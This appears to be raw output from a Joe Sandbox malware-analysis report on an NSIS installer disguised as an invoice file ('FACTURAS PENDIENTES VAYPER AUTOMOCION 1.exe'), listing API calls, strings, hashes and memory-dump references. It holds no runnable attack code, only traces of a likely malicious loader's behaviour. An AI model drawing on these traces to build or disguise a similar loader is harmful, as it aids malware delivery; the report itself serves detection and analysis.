                                  • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                  • Instruction Fuzzy Hash: 07F0BB7150161457D710BB64DE0DB96366CEB00304F54447AA646F62C1EB7C9A54CB9C

                                  Control-flow Graph (rendered graph not reproduced; first node 406a31-406a3d)
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00406A4D
                                  • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CAF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406A68
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A36
                                  • a, xrefs: 00406A46
                                  • n, xrefs: 00406A3F
                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                  • API String ID: 1716503409-1137806429
                                  • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                  • Instruction ID: b372954d90286b94022032574b0bf3fdd655f2b9327b001c14c93946e7bfd4ef
                                  • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                  • Instruction Fuzzy Hash: 1CF0BE72300208BBEB109F44DC09BDE7779EF81710F11C03BE941BB180E6B05A5487A4

                                  Control-flow Graph (rendered graph not reproduced; first node 403148-403181)
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 004031B6
                                  • GetTickCount.KERNEL32 ref: 00403245
                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                                  • wsprintfW.USER32 ref: 00403286
                                    • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CountTick$FilePointerwsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 999035486-2449383134
                                  • Opcode ID: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                  • Instruction ID: b14d6756c9ad048cc293c005f1ed80a68e2f1ec6eb458bfd39e289cb7134058b
                                  • Opcode Fuzzy Hash: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                  • Instruction Fuzzy Hash: CB516E716083429BD710AF269A85A2B7BD9AB84345F044A3FFC55E32D1DB38DA048B5E

                                  Control-flow Graph (rendered graph not reproduced; first node 40141e-401456)
                                  APIs
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                  • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                  • RegCloseKey.ADVAPI32(?), ref: 00401507
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CloseEnum$DeleteValue
                                  • String ID:
                                  • API String ID: 1354259210-0
                                  • Opcode ID: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                  • Instruction ID: 4f1e1c459a9a950a7738efb8d65c2f41013d72b2fa1f43b4319387a01f4f2cce
                                  • Opcode Fuzzy Hash: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                  • Instruction Fuzzy Hash: FD216032108244BBD7219F51DD08FABBBADFF99354F01043EF989A11B0D7359A149A6A

                                  Control-flow Graph (rendered graph not reproduced; first node 40225d-402268)
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C
                                    • Part of subcall function 00405D15: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                    • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                    • Part of subcall function 00405D15: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                    • Part of subcall function 00405D15: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 00405D8C
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480), ref: 00405DB3
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480,0000104D,00000000,?), ref: 00405DCE
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480,00001013,00000000,00000000), ref: 00405DDB
                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 334405425-3542424732
                                  • Opcode ID: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                  • Instruction ID: a1346d69ca964d54404f15d64018e456dfdc0067b09238f3cf27b8b50b8900a8
                                  • Opcode Fuzzy Hash: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                  • Instruction Fuzzy Hash: 6021F832648301A7C711AF619E49A3F76A4AFD8721F60013FF951B12D0DBBC98029A5F
                                  APIs
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnC132.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnC132.tmp,?,?,00000011,00000002), ref: 00402710
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnC132.tmp,?,?,00000011,00000002), ref: 0040271D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CloseValuelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsnC132.tmp
                                  • API String ID: 2655323295-1777003228
                                  • Opcode ID: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                  • Instruction ID: 31e5bc54edfcad7c1b31027c56fe611cf8d7432ac604a3e5fe606c4c5445a84e
                                  • Opcode Fuzzy Hash: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                  • Instruction Fuzzy Hash: 0F210032604300ABD7119FA0CD45A2FBBE8EB88760F10083EF540F31C0C7B99905879A
                                  APIs
                                  • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                  • GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                    • Part of subcall function 00406179: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                    • Part of subcall function 00406179: wsprintfW.USER32 ref: 004061CC
                                    • Part of subcall function 00406179: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                  • API String ID: 2547128583-890815371
                                  • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                  • Instruction ID: 8df058e233f66e35bffb69da01c296363a0ab298929cdf7fbd230430fe9e2c9f
                                  • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                  • Instruction Fuzzy Hash: BAD05B371022159BC7012F62AE0895F776DEF56351705443AF541F7270DB38D82295FD
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E5A
                                  • GetLastError.KERNEL32 ref: 00405E64
                                  • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405E7D
                                  • GetLastError.KERNEL32 ref: 00405E8B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID:
                                  • API String ID: 3449924974-0
                                  • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                  • Instruction ID: 2395f8a8d7837bad9ab877b1c5b4dd478f8f3e4f7c6de220d66e2a00ae86bb09
                                  • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                  • Instruction Fuzzy Hash: A201EC75D00609DFDB109FA0DA44BAE7BB4EF14315F10453AD989F2190D7789648CF99
                                  APIs
                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405F99), ref: 00406999
                                  • RegCloseKey.ADVAPI32(?), ref: 004069A4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID: Call
                                  • API String ID: 3356406503-1824292864
                                  • Opcode ID: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                  • Instruction ID: 602e610a5625c9c57cce2cfaa1a97c2955b97914b1987e410d3f2042aedcb8ce
                                  • Opcode Fuzzy Hash: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                  • Instruction Fuzzy Hash: 65015EB652010ABADF218FA4DD06EEF7BE8EF44754F11013AF801E22A0D374DA64DB94
                                  APIs
                                    • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Tolkningen Setup,NSIS Error), ref: 00406B02
                                    • Part of subcall function 00406BA0: CharNextW.USER32(?,?,?,00000000,00425A48,0040662A,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406BAF
                                    • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BB4
                                    • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BCE
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                    • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                  • lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406667
                                  • GetFileAttributesW.KERNELBASE(00425A48,00425A48), ref: 00406678
                                    • Part of subcall function 004065AA: FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                    • Part of subcall function 004065AA: FindClose.KERNEL32(00000000), ref: 004065C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                  • String ID: HZB
                                  • API String ID: 1879705256-1498320904
                                  • Opcode ID: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                  • Instruction ID: c1f6674fc9072460158ec6ac158274c55d6247b1d16a8c1a13e9c8cd3e3f7c83
                                  • Opcode Fuzzy Hash: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                  • Instruction Fuzzy Hash: 60F0C2715016612AC62033762E89A2B255C8E2136979B4F3FFD97F22D2CA3ECC31956D
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00405E01
                                  • GetLastError.KERNEL32 ref: 00405E0B
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1375471231-823278215
                                  • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                  • Instruction ID: 45d9b0881c8677af27f94d707b600064aa91ade8dc0fdf8d2bf4d46db956c495
                                  • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                  • Instruction Fuzzy Hash: 15C012316000309BC7601B65AE089477E94DB547A13064639B988E1110D6304C5486D8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                  • Instruction ID: 522defa19930b26a7af3553485d7a536a03fd017600a111de47fbc571b524dd9
                                  • Opcode Fuzzy Hash: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                  • Instruction Fuzzy Hash: 4B913371A0C3818BE364CF29C480B6BBBE1AFC9344F10892EE5D997390E774A805CB57
                                  APIs
                                    • Part of subcall function 73472351: GlobalFree.KERNEL32(?), ref: 73472A44
                                    • Part of subcall function 73472351: GlobalFree.KERNEL32(?), ref: 73472A4A
                                    • Part of subcall function 73472351: GlobalFree.KERNEL32(?), ref: 73472A50
                                  • GlobalFree.KERNEL32(00000000), ref: 73471738
                                  • FreeLibrary.KERNEL32(?), ref: 734717C3
                                  • GlobalFree.KERNEL32(00000000), ref: 734717E9
                                    • Part of subcall function 73471FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 73471FFA
                                    • Part of subcall function 734717F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,73471708,00000000), ref: 7347189A
                                    • Part of subcall function 73471F1E: wsprintfW.USER32 ref: 73471F51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                  • String ID:
                                  • API String ID: 3962662361-0
                                  • Opcode ID: 0cd0fac79f4571c499f5537e9e3e5c177396a2323968fd32b082a4316a648ad7
                                  • Instruction ID: 38bb4e8f344b7dfa015c37a6c5027bbf0d850ce2cfd0e21bfdf416ec19d2fe82
                                  • Opcode Fuzzy Hash: 0cd0fac79f4571c499f5537e9e3e5c177396a2323968fd32b082a4316a648ad7
                                  • Instruction Fuzzy Hash: 4341D07240038DAFEB2CAF24C884BDA37FDFB40311F14441DF94E9A281DB74A649D668
                                  APIs
                                  • GlobalFree.KERNEL32(0052FF40), ref: 00401D81
                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Global$AllocFreelstrcat
                                  • String ID: Call
                                  • API String ID: 238967769-1824292864
                                  • Opcode ID: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                  • Instruction ID: 3a6eff4e9616495b68701e132b411bef72aa922240f6375a3907340b29510e26
                                  • Opcode Fuzzy Hash: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                  • Instruction Fuzzy Hash: 7111DF72A12310EBD720AF54DD80A2B73A8FF45718B05443FF946B72D1D738A8109BAE
                                  APIs
                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                  • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Enum$CloseValue
                                  • String ID:
                                  • API String ID: 397863658-0
                                  • Opcode ID: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                  • Instruction ID: 511bfc2a391466f7e6c467a51680e698ffc79b74a509a4b58bb4b7d47538cca8
                                  • Opcode Fuzzy Hash: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                  • Instruction Fuzzy Hash: 8D01B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A2180D7B86904866A
                                  APIs
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnC132.tmp,?,?,00000011,00000002), ref: 0040271D
                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID:
                                  • API String ID: 3356406503-0
                                  • Opcode ID: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                  • Instruction ID: 691293788ab813f7a02a0c784ea8aced05bc34a113cec979fc9dae3080cb0c68
                                  • Opcode Fuzzy Hash: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                  • Instruction Fuzzy Hash: 4911A035658302AED7548FA4DA88A2BB3A4EF84315F10053FF142A21D1D7B85909CB5B
                                  APIs
                                  • MulDiv.KERNEL32(00000011,00007530,00000000), ref: 004013F9
                                  • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: MessageSend
                                  APIs
                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CloseDeleteValue
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402B11
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FilePointer
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040693A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FileRead
                                  APIs
                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,004149C0,00403323,?,004149C0,?,004149C0,?,00000004), ref: 004069FD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FileWrite
                                  APIs
                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Create
                                  APIs
                                  • VirtualProtect.KERNELBASE(7347501C,00000004,00000040,73475034), ref: 73471A68
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  Similarity
                                  • API ID: ProtectVirtual
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,00406980,00000800,?,?,?,Call,00000000,00000000), ref: 004062D7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Open
                                  APIs
                                  • SendMessageW.USER32(0001047A,00000000,00000000,00000000), ref: 004054D5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: MessageSend
                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FilePointer
                                  APIs
                                  • SendMessageW.USER32(00000028,?,?,00405313), ref: 004054EC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: MessageSend
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?), ref: 73472DD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: b7e9fd4b36f8e280b9a07b715e4de0d2a72fbb983709d6d07dc705517d3fa083
                                  • Instruction ID: 7fc9961e8a3e941f44485d0d43d6a024569e27381d620f160d7d0378198e9cbc
                                  • Opcode Fuzzy Hash: b7e9fd4b36f8e280b9a07b715e4de0d2a72fbb983709d6d07dc705517d3fa083
                                  • Instruction Fuzzy Hash: 2A418DB2800348DFEB1CAFA1DA85BC937F9EB48354F3444AEE509EE250D6349581CBD9
                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 00404411
                                  • GetDlgItem.USER32(?,00000408), ref: 0040441D
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404465
                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 0040447E
                                  • SetWindowLongW.USER32(00000000,000000FC,Function_000058AB), ref: 00404495
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044AB
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044BD
                                  • SendMessageW.USER32(00000000,00001109,00000002), ref: 004044D0
                                  • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 004044DC
                                  • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 004044EE
                                  • DeleteObject.GDI32(00000000), ref: 004044F1
                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040451F
                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404529
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004045D4
                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 004045FE
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404614
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404643
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404650
                                  • ShowWindow.USER32(?,00000005), ref: 00404664
                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047A1
                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040481C
                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483B
                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404867
                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040489C
                                  • ImageList_Destroy.COMCTL32(00000000), ref: 004048C3
                                  • GlobalFree.KERNEL32(00000000), ref: 004048D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                  • String ID: M
                                  • API String ID: 1688767230-3664761504
                                  • Opcode ID: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                  • Instruction ID: 6b9816283df2d563a6f6303754403db0efd655586b529c1e8cba48373a45e4bc
                                  • Opcode Fuzzy Hash: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                  • Instruction Fuzzy Hash: 4F12D0B1644301AFD3249F24DC45A2BB7E9EBC8314F10493EFA95E72E1DB789C428B59
                                  APIs
                                  • GetDlgItem.USER32(?,000003FB), ref: 004040B1
                                  • SetWindowTextW.USER32(00000000,?), ref: 004040DB
                                    • Part of subcall function 00406A15: GetDlgItemTextW.USER32(?,?,00000400,00404F27), ref: 00406A28
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
